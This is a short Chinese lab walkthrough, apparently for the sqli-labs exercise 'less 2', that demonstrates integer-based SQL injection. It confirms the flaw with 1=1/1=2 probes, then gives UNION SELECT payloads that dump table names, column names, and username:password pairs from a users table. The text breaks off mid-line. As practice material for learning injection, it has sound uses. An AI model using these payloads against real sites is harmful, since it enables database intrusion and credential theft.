less 2:
有了less 1 的基础,我们就直接进入正题
输入?id=1’ 报错
输入?id=1 and 1=1正常显示
输入?id=1 and 1=2 报错
说明这是一个整数型的注入漏洞
有了less 1的铺垫我们就不用order by猜列数了
爆表名:
1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
接着爆列名
1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'
爆值
1 and 1=2 union select 1,2,group_concat(username,0x3a,password) from users
另外一种wp:<